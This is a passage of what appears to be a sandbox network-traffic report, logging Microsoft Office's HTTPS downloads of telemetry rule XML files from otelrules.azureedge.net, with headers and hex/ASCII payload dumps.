N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-30 11:48:00 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-30 11:48:00 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-30 11:48:00 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-30 11:48:00 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:01 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:02 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 748acc8f-d01e-0082-56a3-42e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114802Z-174f7845968vqt9xhC1EWRgten00000011a0000000009xq1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:02 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:02 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:02 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:02 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 22636776-e01e-0003-4fa8-420fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114802Z-174f7845968qj8jrhC1EWRh41s00000011800000000093e4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:02 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:02 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:02 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 244a857b-101e-008d-0f0a-4192e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114802Z-174f7845968pght8hC1EWRyvxg00000004h0000000005hxg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:02 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49759	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:02 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:02 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114802Z-174f7845968xlwnmhC1EWR0sv80000001140000000008du0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:02 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49758	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:02 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:02 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:02 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114802Z-174f7845968qj8jrhC1EWRh41s00000011cg000000002fsq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:02 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49760	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:04 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:04 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:04 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114804Z-174f7845968j6t2phC1EWRcfe800000011mg000000002aax x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:04 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:04 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:04 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:04 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: cdb469ae-c01e-0014-01b3-42a6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114804Z-174f7845968px8v7hC1EWR08ng00000011hg0000000097v8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:04 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:04 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:04 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:04 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114804Z-174f7845968nxc96hC1EWRspw8000000111000000000931f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:04 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49762	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:04 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:04 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:04 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114804Z-174f7845968vqt9xhC1EWRgten00000011a0000000009xrd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:04 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:04 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:04 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114804Z-174f784596886s2bhC1EWR743w00000011cg000000006vm9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
